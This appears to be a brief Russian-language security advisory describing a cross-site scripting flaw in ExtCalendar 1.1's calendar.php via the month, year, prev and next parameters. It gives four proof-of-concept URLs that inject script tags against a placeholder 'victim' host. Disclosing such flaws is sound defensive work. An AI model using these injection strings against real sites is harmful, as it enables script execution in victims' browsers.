Программа: ExtCalendar 1.1, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах
"month", "year", "prev" и "next" в сценарии calendar.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольный код
сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

http://victim/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>
http://victim/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006
http://victim/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script>
http://victim/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>

 

Оставить мнение